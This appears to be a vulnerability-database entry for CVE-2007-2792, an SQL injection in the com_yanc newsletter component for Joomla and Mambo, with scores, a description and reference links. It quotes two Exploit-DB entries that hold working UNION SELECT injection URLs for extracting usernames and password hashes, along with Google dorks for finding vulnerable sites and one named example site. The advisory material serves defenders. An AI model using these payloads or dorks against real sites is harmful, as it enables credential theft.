CVE-2007-2792
Published 2007-05-22
Priority P344 · high · CVSS 2.0 score 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.76% (88.5th percentile)
SQL injection vulnerability in the Yet another Newsletter Component (aka YaNC or com_yanc) component before 1.5 beta 3 for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the listid parameter to index.php. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| com_yanc | com_yanc | — | — |
No detection rules found.
Exploit-DB
Joomla! Component com_yanc - SQL Injection
exploitdb·2010-02-28
---
[»] Joomla com_yanc Remote Sql Injection Vulnerability
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:[email protected] - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ]
[»] Dork: [inurl:index.php?option=com_yanc "listid" ]
###########################################################################
===[ Exploit ]===
[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
[»]Author: Snakespc <-
###########################################################################
Exploit-DB
Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection
exploitdb·2007-05-17
---
Mambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln
Bulan: Cyber-Security
Exploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Example:http://www.tnrb.net/
google dork: inurl:index.php?option=com_yanc
# milw0rm.com [2007-05-17]
No writeups or analysis indexed.
http://osvdb.org/37948
http://osvdb.org/62620
http://packetstormsecurity.org/0806-exploits/joomlayanc-sql.txt
http://secunia.com/advisories/38780
http://www.exploit-db.com/exploits/11603
http://www.securityfocus.com/bid/24030
http://www.securityfocus.com/bid/38454
https://exchange.xforce.ibmcloud.com/vulnerabilities/56585
https://www.exploit-db.com/exploits/3944